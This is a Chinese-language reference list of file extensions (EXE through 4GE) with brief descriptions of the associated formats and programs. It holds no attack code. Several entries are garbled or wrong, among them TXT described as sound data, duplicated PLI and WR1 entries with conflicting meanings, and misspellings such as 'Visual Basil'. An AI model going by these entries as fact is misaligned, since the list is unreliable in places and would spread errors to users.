EXE 可执行文件（程序）
F FORTRAN文件
F2R Farandoyle线性模块格式
F3R Farandoyle分块线性模块格式
F77 FORTRAN文件
F90 FORTRAN文件
FAR Fradole Composer音乐模块（MOD）文件
FAV Microsoft Outlook导航条
FAX 传真类型图像
FBK Navison 金融备份
FCD 虚拟CD-ROM
FDB Navison 金融数据库
FDF Adobe Acrobat表单文档文件
FEM CADRE有限元素网络文件
FFA，FFL，FFO，FFK Microsoft快速查找文件
FFF GUS PnP银行文件格式
FFT 最终格式文本（IBM的DCA一部分）
FH3 Aldus Freehand 3绘图文件
FIF Fractal图像文件
FIG REND386/AVRIL使用的文件格式
FITS CCD照相机图像；灵活图像传输系统
FLA Macromedia Flash电影
FLC Autodesk FLIC动画文件
FLF Corel Paradox产生的格式：Navison Financials许可文件；OS/2驱动程序文件
PLI Autodesk FLIC动画
FLT StarTrekker音乐模块(MOD)文件；MultiGen Inc的Open Flight使用的文件格式；Corel过滤器文件
FM Adobe FrameMaker文档
FMB Oracle4.0版或以后版本表单的二进制源代码文件
FML 文件镜象列表（GetRight）
FMT Oracle 4.0版或以后版本表单的文本格式；Microsoft Schedule+ 打印文件
FMX Oracle 4.0版或以后版本可执行表单
FND Microsoft Explorer保存的搜索文件（Find applet）
FNG 字体组文件（字体导航器，Font Navigator）
FNK Funk Tracker模块格式
FOG Fontographer模块字体
FON 系统字体
FOR FORTRAN文件
FOT 字体相关文件
FP FileMaker Pro文件
FP1 Flying Pigs for Windows数据文件
FP3 FileMaker Pro文件
FPT FileMaker Pro文件；Microsoft Fox Pro备注字体文件
FPX FlashPix位图
FRM 表单；Frame Maker或Frame Builder文档；Oracle可执行表(3.0版或早期版本)；Visual Basic表单；WordPerfect Merge表单；DataCAD标志报表文件
FRT Microsoft FoxPro报表文件
FRX Visual Basic表单文本；Microsoft FoxPro报表文件
FSF fPrint Audit Tool文件格式
FSL Borland的Paradox 7表单；Corel Paradox保存的表单
FSM Parandoyle示例格式
FT Lotus Notes全文本索引
FTG 全文本搜索组文件，由Windows帮助系统查找时产生--可以删除，并在需要时重建起来
FTS 全文本搜索引文件，由Windows帮助系统查找时产生
FW2 Framework Ⅱ文件
FW3 Framework Ⅲ文件
FW4 Framework Ⅳ文件
FXP 经Microsoft FoxPro编译的源文件
FZB Casio FZ-1银行转储
FZF Casio FZ-1完全转储
FZV Casio FZ-1声音转储
G721 Raw CCITT G.721 $bit ADPCM格式数据
G723 Raw CCITT G.723 3或5bit ADPCM格式数据
GAL Corel多媒体管理器相集
GCD Generic CADD绘画文件（后续版本）
GCP Ground Control Point（地面控制点）文件，用于远景数据形成图像过程，经常用于生成图工程-CHIPS（copenhagen image processing system）使用这些文件
GDB InterBase数据库文件
GDM 铃声、口哨声和声音板模块格式
GED GEDCOM 系谱数据文件，用于记录和交换系谱数据的流行格式；图形环境文档绘画
GEM GEM元文件
GEN Ventura产生的文本文件
GetRight GetRight未完成的下载文件
GFC Patton&Patton FlowCharting 4 flowchart文件
GFI，GFX Genigraphics图形链接表示文件
GHO Norton 克隆磁盘映像
GID Windows 95全局索引文件（包括帮助状态）
GIF CompuServe位图文件
GIM，GIX Genigraphics图形链接介绍文件
GKH Ensoniq EPS家簇磁盘映像文件
GKS Gravis Grip Key文档
GL 动画格式
GNA Genigraphics图形链接介绍文件
GNT 生成代码，Micro Focus属性格式里的可执行代码
GNX Genigraphics图形链接介绍文件
GRA Microsoft Graph文件
GRD 用于远程视景数据产生地图过程的格式文件，通常应用于形成地图工程-CHIPS（copenhagen image processing system）使用这些文件
GRF Grapher（Golden Software公司）图形文件
GRP 程序管理组
GSM Raw GSM 6.10音频流；Raw"byte aligned（比特对齐的）" GSM 6.10音频流；US Robotics语音调制解调器
GTK Graoumftracker（老）音乐模块（MOD）文件
GT2 Graoumftracker（新）音乐模块（MOD）文件
GWX，GWZ Cenigraphis图形链接介绍文件
GZ UNIX gzip压缩文件
H C程序头文件
HCM IBM HCM配置文件
HCOM 声音工具HCOM格式
HCR IBM HCD/HCM产品配置文件
HDF 高级计算机应用程序本地中心（NCSA） geospatial Hierarchial数据格式文件
HED HighEdit文档
HEL Microsoft Hellbender格式保存的游戏文件
HEX Macintosh BinHex2.0文件
HGL HP图形语言绘图文件
HH 映射文件，包括一些话题ID和在帮助文件系统中话题的映射数字-允许运行中应用程序发送给用户合适的上下文帮助话题
HLP 帮助文件；Date CAD Windows帮助文件
HOG Lucas Arts的Dark Forces WAD文件
HPJ Visual Basic帮助工程
HPP C++程序头文件
HQX Macintosh BinHex 4.0文件
HST 历史文件
HT HyperTerminal（超级终端）
HTM，HTML 超文本文档
HTT Microsoft超文本模板
HTX 扩展HTML模板
HXM Descent2 HAM文件扩展
ICA Citrix文件
ICB Targa位图文件
ICC Kodak打印机格式文件
ICL 图标库文件
ICM 图形颜色匹配配置文件
ICO Windows图标
IDB MSDev中间层文件
IDD MIDI设备定义
IDF MIDI设备定义（Windows 95需要的文件）
IDQ Internet数据查询文件
IDX Microsoft FoxPro相关数据库索引文件；Symantec Q&A相关数据库索引文件；Microsoft Outlook Express文件
IFF 交换格式文件；Amiga ILBM
IGES 初始图形交换说明文件
IGF 插入系统元文件
IIF QuickBooks for Windows交换文件
ILBM 位图图形文件
IMA WinImage磁盘映像文件
IMG GEM映像
IMZ WinImage压缩磁盘映像文件
INC 汇编语言或动态服务器包含文件
INF 信息文件
INI 初始化文件；MWave DSP Synth的"nwsynth.ini" GMS安装；Cravis Ultrasound bank安装
INP Oracle 3.0版或早期版本的表单源代码
INRS INRS远程通信声频
INS InstallShield安装脚本；X-Internet签字文件；Ensoniq EPS字簇设备；Cell/ⅡMAC/PC抽样设备
INT 中间代码，当一个源程序经过语法检查后编译产生一个可执行代码
IOF Findit文档
IQY Microsoft Internet查询文件
ISO 根据ISD 9660有关CD-ROM文件系统标准列出CD-ROM上的文件
ISP X-Internet签字文件
IST 数字跟踪设备文件
ISU InstallShield卸装脚本
IT 脉冲跟踪系统音乐模块(MOD)文件
ITI 脉冲跟踪系统设备
ITS 脉冲跟踪系统抽样，Internet文档位置
IV Open Inventor中使用的文件格式
IVD 超过20/20微观数据维数或变量等级文件
IVP 超过20/20的用户子集配置文件
IVT 超过20/20表或集合数据文件
IVX 超过20/20微数据目录文件
IW Idlewild屏幕保护程序
IWC Install Watch文档
J62 Ricoh照相机格式
JAR Java档案文件（一种用于applet和相关文件的压缩文件）
JAVA Java源文件
JBF Paint Shop Pro图像浏览文件
JFF，JFIF，JIF JPEG文件
JMP SAS的JMPDiscovery表格统计文件
JN1 Epic MegaGames的Jill of the Jungle数据文件
JPE，JPEG，JPG JPEG图形文件
JS JavaScript源文件
JSP HTML网页，其中包含有对一个Java servlet的参考
JTF JPEG位图文件
K25 Kurzweil 2500抽样文件
KAR 卡拉OK MIDI文件（文本+MIDI）
KDC Kodak光增强器
KEY DataCAD图标工具条文件
KFX KoFak Group 4图像文件
KIZ Kodak数字明信片文件
KKW RoboHELP帮助工程索引设计器中与主题无关的K开头的所有关键字
KMP Korg Trinity KeyMap文件
KQP Konica照相机本地文件
KR1 Kurzweil 2000抽样（多软驱）文件
KRZ Kurzweil 2000抽样文件
KSF Korg Trinity抽样文件
KYE Kye游戏数据
LAB Visual dBASE标签文件
LBM Deluxe Paint位图文件
LBT，LBX Microsoft FoxPro标签文件
LDB Microsoft Access加锁文件
LDL Corel Paradox分发库
LEG Legacy文档
LES Logitech娱乐系统游戏配置文件（与REC文件一样）
LFT 3D Studio（DOS）放样文件
LGO Paintbrush（Microsoft画图应用程序）的徽标文件
LHA LZH更换文件后缀
LIB 库文件
LIN DataCAD线型文件
LIS 结构化查询报告（SQR）程序产生的输出文件
LLX Laplink交换代理
LNK Windows快捷方式文件
LOG 日志文件
LPD Helix Nut和Bolt文件
LRC Intel可视电话文件
LSL Corel Paradox保存的库文件
LSP AutoLISP、CommonLISP和其他LISP语言文件
LST 列表文件
LU ThoughtWing库单元文件
LVL Parallax Software的 Miner Descent/D2 Level扩展
LWLO Lightwave分层对象文件
LWOB Lightwave对象文件
LWP Lotus WordPro 96/97文件
LWSC Lightwave视景文件
LYR DataCAD层文件
LZH LH ARC压缩档案
LZS Skyroads数据文件
M1V MPEG相关文件(MIME"mpeg"类型)
M3D Corel Motion 3D动画文件
M3U MPEG URL（MIME声音文件）
MAC MacPaint图像文件
MAD Microsoft Access模块文件
MAF Microsoft Access表单文件
MAG 在一些日本文件中发现的图形文件格式
MAGIC 魔力邮件监视器配置文件
MAK Visual Basil或Microsoft Visual C++工程文件
MAM Microsoft Access宏
MAN UNIX手册页输出
MAP 映射文件；Duke Nukem 3D WAD游戏文件
MAQ Microsoft Access查询文件
MAR Microsoft Access报表文件
MAS Lotus Freelance Graphics Smart Master文件
MAT Microsoft Access表；3D Studio MAX材料库
MAUD MAUD抽样格式
MAX Kinetx的3DStudio MAX文件；该格式用于一个3D场景文件；Paperport文件；OrCAD设计文件
MAZ Hover迷路数据；Division的dVS/dVISE使用的文件格式
MB1 Apogee Monster Bash数据文件
MBOX Berkeley Unix邮箱格式
MBX Microsoft Outlook保存email格式；Eudora邮箱
MCC Dailerl0呼叫卡
MCP Metrowerks CodeWarrior工程文件
MCR DataCAD键盘宏文件
MCW Microsoft Word的Macintosh文档
MDA Microsoft Access内抽入器；Microsoft Access 2.0版及其后续版本的工作组事件
MDB Microsoft Access数据库
MDE Microsoft Access MDE文件
MDL 数字跟踪器音乐模块（MOD）文件；Quake模 块文件
MDN Microsoft Access空数据库模板
MDW Microsoft Access工作组文件
MDZ Microsoft Access向导模板文件
MED 音乐编辑器，OctaMED音乐模块（MOD）文件
MER 电子表格/数据库数据交换格式；FileMaker、Excel及其他软件能识别
MET 表示管理器元文件
MFG Pro/ENGINEER制造文件
MGF 在材料与几何学里的文件格式
MHTM，MHTML MHTML文档（MIME）
MI 杂项
MIC Microsoft Image Composer文件
MID MIDI音乐
MIF Adobe FramMaker交换格式
MIFF 与机器无关格式文件
MIM，MIME，MME Internet邮件扩展格式的多用途文件，经常作为发送e-mail时在AOL里附件而创建的文件；在一个多区MIM文件里的文件能用WinZip或其他类似程序打开
MLI 3D Studio的材料库格式文件
MMF Meal Master格式；一个处方类格式；Microsoft邮件文件
MMG 超过20/20表或集会数据文件
MMM Microsoft多媒体电影
MMP Mindmapor Mind Manager文件
MN2 Descent2任务文件
MND，MNI Mandelbort for Windows
MNG 多映像网络图形
MNT,MNX Microsoft FoxPro菜单文件
MNU Visual dBASE菜单文件；Intertel Systems Interact菜单文件
MOD Fast Tracker、Star Trekker、Noise Tracker(等等)音乐模块文件；Microsoft多计划电子表格；Amiga/PC磁道文件
MOV QuickTime for Windows电影
MP2 第二层MPEG音频文件
MP3 第三层MPEG音频文件
MPA MPEG相关文件，MIME"mpeg类型"
MPE，MPEG，MPG MPEG动画文件
MPP Microsoft工程文件；CAD绘图文件格式
MPR Microsoft FoxPro菜单（已编译）
MRI MRI扫描文件
MSA 魔术阴影档案
MSDL Manchester的场景描述语言
MSG Microsoft邮件消息
MSI Windows 安装器包
MSN Microsoft网络文档；Descent Mission文件
MSP Microsoft Paint（画图）位图文件；Windows Installer路径文件
MST Windows 安装器传输文件
MTM Multi 跟踪器音乐模块（MOD）文件
MUL Ultima在线
MUS 音乐
MUS10 Mus10声音
MVB Microsoft多媒体查看器文件
MWP Lotus WordPro 97 Smart Master文件
NAN Nanoscope文件(Raw Grayscale)
NAP NAP元文件
NCB Microsoft Developer Studio文件
NCD Norton改变目录
NCF NetWare命令文件；Lotus Notes内部剪切板
NDO 3D 低多边形建模器，Nendo
netCDF 网络公用数据表单
NFF 中性文件格式
NFT NetObject Fusion模板文件
NIL Norton光标库文件（EasyIcons-兼容）
NIST NIST Sphere声音
NLB Oracle 7数据
NLM NetWare可装载模块
NLS 用于本地化的国家语言支持文件（例如，Uniscape）
NLU Norton Live Update e-mail 触发器文件
NOD NetObject Fusion文件
NSF Lotus Notes数据库
NSO NetObject Fusion文档文件
NST Noise Tracker音乐模块（MOD）文件
NS2 Lotus Notes数据库（第二版）
NTF Lotus Notes数据库模板
NTX CA-Clipper索引文件
NWC Noteworthy Composer歌曲文件
NWS Microsoft Outlook Express新闻消息（MIME RFC822）
O01 台风声音文件
OBD Microsoft Office活页夹
OBJ 对象文件
OBZ Microsoft Office活页夹向导
OCX Microsoft对象链接与嵌入定制控件
ODS Microsoft Outlook Express邮箱文件
OFF 3D 网状物对象文件格式
OFN Microsoft Office FileNew文件
OFT Microsoft Outlook模板
OKT Oktalyzer音乐模块（MOD）文件
OLB OLE对象库
OLE OLE对象
OOGL 面向对象图形库
OPL 组织者编程语言源文件--Psion/Symbian
OPO OPL输出可执行文件
OPT Microsoft Developer Studio文件
OPX OPL扩展DLL（动态链接库）
ORA Oracle 7 配置文件
ORC Oracle 7脚本文件
ORG Lotus Organizer 文件
OR2 Lotus Organizer 2 文件
OR3 Lotus Organizer 97 文件
OSS Microsoft Office查找文件
OST Microsoft Exchange / Outlook 离线文件
OTL Super NoteTab 模板文件
OUT C语言输出文件
P3 Primavera Project Planner（工程设计器）文件
P10 Tektronix Plot 10 绘图文件
P65 PageMaker 6.5文件
P7C Digital ID 文件（MIME）
PAB Microsoft个人地址簿
PAC SB Studio Ⅱ 包
PAK Quake WAD文件
PAL 压缩文件
PART Go！Zilla部分下载文件
PAS Pascal源代码
PAT DataCAD Hatch模式文件；CorelDRAW模式；高级Gravis Ultrasound / Forte 技术；碎片文件
PBD PowerBuilder动态库，作为本地DLL的一个替代物
PBF Turtle Beach的Pinnacle 银行文件
PBK Microsoft PhoneBook（电话簿）
PBL 用于在PowerBuilder开发环境中的PowerBuilder动态库
PBM 可导出位图
PBR PowerBuilder资源
PCD Kodak Photo-CD映像；P-Code编译器测试脚本，由Microsoft测试与Microsoft Visual测试
PCE Maps Eudora邮箱名字的DOS文件名
PCL Hewlett-Packard 打印机控制语言文件（打印机备用位图）
PCM 声音文件格式；OKI MSM6376 合成芯片 PCM格式
PCP Symantec Live Update Pro文件
PCS PICS动画文件
PCT Macintosh PICT绘画文件
PCX Zsoft PC画笔位图
PDB 3Com PalmPilot数据库文件
PDD 可以用Paint Shop Pro或其他图像处理软件打开的图形图像
PDF Adobe Acrobat 可导出文档格式文件（可用Web浏览器显示）；Microsoft系统管理服务器包定义文件；NetWare打印机定义文件
PDP Broderbund的Print Shop Deluxe文件
PDQ Patton&Patton Flowercharting PDQ Lite 文件
PDS 摄影图像文件（该文件格式的来源不清楚）
PF Aladdin系统对私人文件进行加密的文件
PFA 类型1字体（ASCⅡ）
PFB 类型1字体（二进制）
PFC PF组件
PFM 打印机字体尺度
PGD 良好隐私（Pretty Good Privacy，PGP）虚拟磁盘文件
PGL HP绘图仪绘图文件
PGM 可输出灰度图（位图）
PGP 用良好隐私（PGP）算法加密文件
PH 由Microsoft帮助文件编译器产生的临时文件
PHP，PHP3 包含有PHP脚本的HTML网页
PHTML 包含有PHP脚本的HTML网页；由Perl分析解释的HTML
PIC PC画图位图；Lotus图片；Macintosh PICT绘图
PICT Macintosh PICT图形文件
PIF 程序信息文件；IBM PIF绘图文件
PIG LucasArts的Dark Forces WAD文件
PIN Epic Pinball数据文件
PIX 内置系统位图
PJ MKS源完整性文件
PJX，PJT Microsoft Visual FoxPro工程文件
PKG Microsoft Developer Studio应用程序扩展（与DLL文件类似）
PKR PGP的公用钥匙环
PL Perl程序
PLG 由REND386/AVRIL使用的文件格式
PLI Oracle 7数据描述
PLM Discorder Tracker2模块
PLS Disorder Tracker2抽样文件；MPEG PlayList文件（由WinAmp使用）
PLT HPGL绘图仪绘图文件；AutoCAD plot绘图文件；Gerber标志制作软件
PM5 Pagemaker 5.0文件
PM6 Pagemaker 6.0文件
PNG 可移植的网络图形位图；Paint Shop Pro浏览器目录
PNT，PNTG MacPaint图形文件
POG Descent2 PIG文件扩展
POL Windows NT策略文件
POP Visual dBASE上托文件
POT Microsoft Powerpoint模块
POV 视频射线跟踪器暂留
PP4 Picture Publisher 4位图
PPA Microsoft Powerpoint内插器
PPF Turtle Beach的Pinnacle程序文件
PPM 可移植的象素映射位图
PPP Parson Power Publisher；Serif PagePlus桌面出版缺省输出
PPS Microsoft Powerpoint幻灯片放映
PPT Microsoft Powerpoint演示文稿
PQI PowerQuest驱动器图像文件
PRC 3COM PalmPiltt资源（文本或程序）文件
PRE Lotus Freelance演示文稿
PRF Windows系统文件，Macromedia导演设置文件
PRG dBASE Clipper和FoxPro程序源文件；WAVmaker程序
PRJ 3D Studio（DOS）工程文件
PRN 打印表格（用空格分隔的文本）；DataCAD Windows打印机文件
PRP Oberson的Prospero数据转换产品保存的工程文件
PRS Harvard Graphics for Windows演示文件
PRT 打印格式化文件；Pro/ENGINEER元件文件
PRV PsiMail Internet提供者模板文件
PRZ Lotus Freelance Graphics 97文件
PS Postscript格式化文件（PostScript打印机可读文件）
PSB Pinnacle Sound Bank
PSD Adobe photoshop位图文件
PSI PSION a-Law声音文件
PSM Protracker Studio模型格式；Epic游戏的源数据文件
PSP Paint Shop Pro图像文件
PST Microsoft Outlook个人文件夹文件
PTD Pro/ENGINEER表格文件
PTM Polytracker音乐模块（MOD）文件
PUB Ventura Publisher出版物；Microsoft Publisher文档
PWD Microsoft Pocket Word文档
PWL Windows 95口令列表文件
PWP Photoworks图像文件（能被Photoworks浏览的一系列文件）
PWZ Microsoft Powerpoint向导
PXL Microsoft Pocket Excel电子表格
PY 来自Yahoo的电子消息；Python脚本文件
PYC Python脚本文件
QAD PF QuickArt文档
QBW QuickBooks for Windows文件
QDT 来自Quicken UK的QuickBooks数据文件，帐目/税/货单程序
QD3D Apple的QuickDraw 3D元文件格式
QFL FAMILY LAWYER文档
QIC Microsoft备份文件
QIF QuickTime相关图像（MIME）；Quicken导入文件
QLB Quick库
QM Quality Motion文件
QRY Microsoft查询文件
QST Quake Spy Tab文件
QT，QTM QuickTime电影
QTI，QTIF QuickTime相关图像
QTP QuickTime优先文件
QTS Mac PICT图像文件；QuickTime相关图像
QTX QuickTime相关图像
QW Symantec Q&A Write程序文件
QXD Quark XPress文件
R Pegasus邮件资源文件
RA RealAudio声音文件
RAM RealAudio元文件
RAR RAR压缩档案（Eugene Roshall格式）
RAS Sun光栅图像位图
RAW RAW文件格式（位图）；Raw标识的PCM数据
RBH 由RoboHELP维持的RBH文件，它加入到一个帮助工程文件的信息中
RDF 资源描述框架文件（涉及XML和元数据）
RDL Descent注册水平文件
REC 录音机宏；RapidComm声音文件
REG 注册表文件
REP Visual dBASE报表文件
RES Microsoft Visual C++资源文件
RFT 可修订的表单文本（IBM的DCA一部分或文档内容框架结构一部分）
RGB，SGI Silicon图形RGB文件
RLE Run-Length编码的位图
RL2 Descent2注册水平文件
RM RealAudio视频文件
RMD Microsoft RegMaid文档
RMF Rich Map格式（3D游戏编辑器使用它来保存图）
RMI M1D1音乐
ROM 基于盒式磁带的家庭游戏仿真器文件（来自Atari 2600、Colecovision、Sega、Nintendo等盒式磁带里的ROM完全拷贝，在两个仿真器之间不可互修改）
ROV Rescue Rover数据文件
RPM RedHat包管理器包（用于Linux）
RPT Microsoft Visual Basic Crystal报表文件
RRS Ace game Road Rash保存的文件
RSL Borland的Paradox 7报表
RSM WinWay Resume Writer恢复文件
RTF Rich Text格式文档
RTK RoboHELP使用的用来模拟Windows帮助的搜索功能
RTM Real Tracker音乐模块（MOD）文件
RTS RealAudio的RTSL文档；RoboHELP对复杂操作进行加速
RUL InstallShield使用的扩展名
RVP Microsoft Scan配置文件（MIME）
Rxx 多卷档案上的RAR压缩文件（xx= 1～99间的一个数字）
S 汇编源代码文件
S3I Scream Tracker v3设备
S3M Scream Tracker v3的声音模块文件
SAM Ami专业文档；8位抽样数据
SAV 游戏保存文件
SB 原始带符号字节（8位）数据
SBK Creative Labs的Soundfont 1.0 Bank文件；(Soundblaster)/EMU SonndFont v1.x Bank文件
SBL Shockwave Flash对象文件
SC2 Microsoft Schedule+7文件格式；SAS目录（Windows 95/NT、OS/2、Mac）
SC3 SimCity 3000保存的游戏文件
SCC Microsoft Source Safe文件
SCD Matrix/Imapro SCODL幻灯片图像；Microsoft Schedule +7
SCF Windows Explorer命令文件
SCH Microsoft Schedule+1
SCI ScanVec Inspire本地文件格式
SCN True Space 2场景文件
SCP 拨号网络脚本文件
SCR Windows屏幕保护；传真图像；脚本文件
SCT SAS目录（DOS）；Scitex CT位图；Microsoft FoxPro表单
SCT01 SAS目录（UNIX）
SCV ScanVec CASmate本地文件格式
SCX Microsoft FoxPro表单文件
SD Sound Designer 1声音文件
SD2 Sound Designer 2展平文件/数据分叉指令；SAS数据库（Windows 95/NT、OS/2、Mac）
SDF 系统数据文件格式-Legacy Unisys（Sperry）格式
SDK Roland S-系列软盘映像
SDL Smart Draw库文件
SDR Smart Draw绘图文件
SDS 原始Midi抽样转储标准文件
SDT SmartDraw模板
SDV 分号分隔的值文件
SDW Lotus WordPro图形文件；原始带符号的DWORD（32位）数据
SDX 由SDX压缩的Midi抽样转储标准文件
SEA 自解压档案（Stufflt for Macintosh或其他软件使用的文件）
SEP 标签图像文件格式（TIFF）位图
SES Cool Edit Session文件（普通数据声音编辑器文件）
SF IRCAM声音文件格式
SF2 Emu Soundfont v2.0文件；Creative Labs的Soundfont 2.0 Bank文件（Sound Blaster）
SFD SoundStage声音文件数据
SFI Sound Stage声音文件信息
SFR Sonic Foundry Sample资源
SFW Seattle电影工程（损坏的JPEG）
SFX RAR自解压档案
SGML 标准通用标签语言
SHB Corel Show演示文稿；文档快捷文件
SHG 热点位图
SHP 3D Studio（DOS）形状文件；被一些应用程序用于多部分交互三角形模型的3D建模
SHS Shell scrap文件；据载用于发送"口令盗窃者"
SHTML 含有服务器端包括（SSI）的HTML文件
SHW Corel Show演示文稿
SIG 符号文件
SIT Mac的StuffIt档案文件
SIZ Oracle 7配置文件
SKA PGP秘钥
SKL Macromedia导演者资源文件
SL PACT的保存布局扩展名
SLB Autodesk Slide库文件格式
SLD Autodesk Slide文件格式
SLK Symbolic Link（SYLK）电子表格
SM3 DataCAD标志文件
SMP Samplevision格式；Ad Lib Gold抽样文件
SND NeXT声音；Mac声音资源；原始的未符号化的PCM数据；AKAI MPC系列抽样文件
SNDR Sounder声音文件
SNDT Sndtool声音文件
SOU SB Studio Ⅱ声音
SPD Speech数据文件
SPL Shockwave Flash对象；DigiTrakker抽样
SPPACK SPPack声音抽样
SPRITE Acorn的位图格式
SQC 结构化查询语言（SQR）普通代码文件
SQL Informix SQL查询；通常被数据库产品用于SQL查询（脚本、文本、二进制）的文件扩展名
SQR 结构化查询语言（SQR）程序文件
SSDO1 SAS数据集合（UNIX）
SSD SAS数据库（DOS）
SSF 可用的电子表格文件
ST Atari ST磁盘映像
STL Sterolithography文件
STM .shtml的短后缀形式，含有一个服务端包括（SSI）的HTML文件；Scream Tracker V2音乐模块（MOD）文件
STR 屏幕保护文件
STY Ventura Publisher风格表
SVX Amiga 8SVX声音；互交换文件格式，8SVX/16SV
SW 原始带符号字（16位）数据
SWA 在Macromedia导演文件（MP3文件）中的Shockwave声音文件
SWF Shockwave Flash对象
SWP DataCAD交换文件
SYS 系统文件
SYW Yamaha SY系列波形文件
T64 Commodore 64仿真器磁带映像文件
TAB Guitar表文件
TAR 磁带档案
TAZ UNIX gzip/tape档案
TBK Asymetrix Toolbook交互多媒体文件
TCL 用TCL/TK语言编写的脚本
TDB Thumbs Plus数据库
TDDD Imagine 和 Turbo Silver射线跟踪器使用的文件格式
TEX 正文文件
TGA Targa位图
TGZ UNIX gzip/tap档案文件
THEME Windows 95桌面主题文件
THN Graphics WorkShop for Windows速写
TIF，TIFF 标签图像文件格式（TIFF）位图
TIG 虎形文件，美国政府用于分发地图
TLB OLE类型库
TLE 两线元素集合（NASA）
TMP Windows临时文件
TOC Eudora邮箱内容表
TOL Kodak照片增强器
TOS Atari 16/32和32/32计算机操作系统文件
TPL CakeWalk声音模板文件；DataCAD模板文件
TPP Teleport Pro工程
TRK Kermit脚本文件
TRM 终端文件
TRN MKS源完整性工程用法日志文件
TTF TrueType字体文件
TTK Corel Catalyst Translaton Tool Kit
TWF TabWorks文件
TWW Tagwrite模板
TX8 MS-DOS文本
TXB Descent/D2编码概要文件
TXT ASCⅡ文本格式的声音数据
TXW Yamaha TX16W波形文件
TZ 老的压缩格式文件
T2T Sonate CAD建模软件文件
UB 原始未符号化的字节（8位）数据
UDF Windows NT/2000唯一性数据库文件
UDW 原始未符号化的双字（32位）数据
ULAW 美国电话格式（CCITT G.711）声音
ULT Ultra Tracker音乐模块（MOD）文件
UNI MikMod UniMod格式化文件
URL Internet快捷方式文件
USE MKS源完整性文件
UU，UUE UU编码文件
UW 原始未符号化字（16位）数据
UWF UltraTracker波形文件
V8 Covox 8位声音文件
VAP 加注讲演文件
VBA VBase文件
VBP Microsoft Visual Basic工程文件
VBW Microsoft Visual Basic工作区文件
VBX Microsoft Visual Basic用户定制控件
VCE Natural MicroSystems（NMS）未格式化声音文件（由Cool Edit使用）
VCF 虚拟卡文件（Netscape）；Veri配置文件；为与Sense8的WordToolkit一起使用而定义对象
VCT，VCX Microsoft FoxPro类库
VDA Targa位图
VI National Instruments LABView产品的虚拟设备文件
VIFF Khoros Visualisation格式
VIR Norton Anti-Virus或其他杀毒产品用于标识被病毒感染的文件
VIV VivoActive Player流视频文件
VIZ Division的dVS/dVISE文件
VLB CorelVentura库
VMF FaxWorks声音文件
VOC Creative Labs的Sound Blaster声音文件
VOX 用ADPCM编码的对话声音文件；Natural MicroSystems（NMS）格式化声音文件，Talking Technology声音文件
VP Ventura Publisher出版物
VQE，VQL Yamaha Sound-VQ定位器文件
VQF Yamaha Sound-VQ文件（可能出现标准）
VRF Oracle 7配置文件
VRML 虚拟现实建模语言文件
VSD Visio绘画文件（流程图或图解）
VSL 下载列表文件（GetRight）
VSN Windows 9x/NT Virusafe版文件，用于保持有关目录中所有信息，当一个文件被访问，其中信息与VSN信息进行比较，以确保它们保持一致
VSS Visio模板文件
VST Targa位图
VSW Visio工作区文件
VXD Microsoft Windows虚拟设备驱动程序
W3L W3Launch文件
WAB Microsoft Outlook文件
WAD 包含有视频、玩家水平和其他信息的DOOM游戏的大文件
WAL Quake 2正文文件
WAV Windows波形声形
WB1，WB2 QuattoPro for Windows电子表格
WBK Microsoft Word备份文件
WBL Argo WebLoadⅡ上载文件
WBR Crick Software的WordBar文件
WBT Crick Software的WordBar模板
WCM WordPerfect宏
WDB Microsoft Works数据库
WDG War FTP远程守护者文件
WEB CorelXARA Web文档
WFB Turtle Beach的Wavefont Bank（Maui/Rio/Monterey）
WFD Turtle Beach的Wavefont Drum集合（Maui/Rio/Monterey）
WFM Visual dBASE Windows表单
WFN 在CorelDRAW中使用的符号
WFP Turtle Beach的Wavefont程序（Maui/Ri/Monterey）
WGP Wild Board游戏数据文件
WID Ventura宽度表
WIL WinImage文件
WIZ Microsoft Word向导
WK1 Lotus 1-2-3版第1、2版的电子表格
WK3 Lotus 1-2-3版第3版的电子表格
WK4 Lotus 1-2-3版第4版的电子表格
WKS Lotus 1-2-3电子表格；Microsoft Works文档
WLD REND386/AVRIL文件
WLF Argo WebLoadⅠ上载文件
WLL Microsoft Word内插器
WMF Windows元文件
WOW Grave Composer音乐模块（MOD）文件
WP WordPerfect文档
WP4 WordPerfect 4文档
WP5 WordPerfect 5文档
WP6 WordPerfect 6文档
WPD WordPerfect文档或演示
WPF 可字处理文档
WPG WordPerfect图形
WPS Microsoft Works文档
WPT WordPerfect模板
WPW Novell PerfectWorks文档
WQ1 Quattro Pro/DOS电子表格
WQ2 Quattro Pro/DOS第5版电子表格
WR1 Lotus Symphony
WRG ReGet文档
WR1 书写器文档
WRK Cakewalk音乐声音工程文件
WRL 虚拟现实模型
WRZ VRML文件对象
WS1 WordStar for Windows 1文档
WS2 WordStar for Windows 2文档
WS3 WordStar for Windows 3文档
WS4 WordStar for Windows 4文档
WS5 WordStar for Windows 5文档
WS6 WordStar for Windows 6文档
WS7 WordStar for Windows 7文档
WSD WordStar 2000文档
WVL Wavelet压缩位图
WWL Microsoft Word内插器文件
X AVS图像格式
XAR CorelXARA绘画
XBM MIME"xbitmap"图像
XI Scream Tracker设备抽样文件
XIF Wang映像文件（Windows 95带有的文件）
XLA Microsoft Excel内插器
XLB Microsoft Excel工具条
XLC Microsoft Excel图表
XLD Microsoft Excel对话框
XLK Microsoft Excel备份
XLL Microsoft Excel内插器文件
XLM Microsoft Excel宏
XLS Microsoft Excel工作单
XLT Microsoft Excel模板
XLV Microsoft Excel VBA模块
XLW Microsoft Excel工作簿/工作区
XM FastTracker 2，Digital Tracker音乐模块（MOD）文件
XNK Microsoft Exchange快捷方式文件
XPM X位图格式
XR1 Epic MegaGames Xargon数据文件
XTP Xtree数据文件
XWD X Windows转储格式
XWF Yamaha XG Works文件（MIDI序列）
XY3 XYWrite Ⅲ文档
XY4 XYWrite Ⅳ文档
XYP XYWrite Ⅲ Plus文档
XYW XYWrite for Windows 4.0文档
X16 宏媒体扩展（程序扩展），16位
X32 宏媒体扩展（程序扩展），32位
YAL Arts& Letters剪贴艺术库
YBK Microsoft Encarta 年鉴
Z UNIX gzip文件
ZAP Windows软件安装配置文件
ZIP Zip文件
ZOO 早前版本的压缩文件
000-999 用于为老版本（或备份）文件编号（比如：被安装程序改变的CONFIG.SYS文件）；又可用于为小范围的PC应用程序的多个用户相关数据文件编号
12M Lotus 1-2-3 97 SmartMaster文件
123 Lotus 1-2-3 97文件
2D VersaCAD的2维绘画文件
2GR，3GR 在Windows之下的VGA图形驱动程序/配置文件
3D VersaCAD的3维绘画文件
3DM 3D NURBS建模器，Rhino
3DS 3D Studio（DOS下）格式文件
386 在386或更高级处理器上使用的文件
4GE Informix 4GL编译后代码
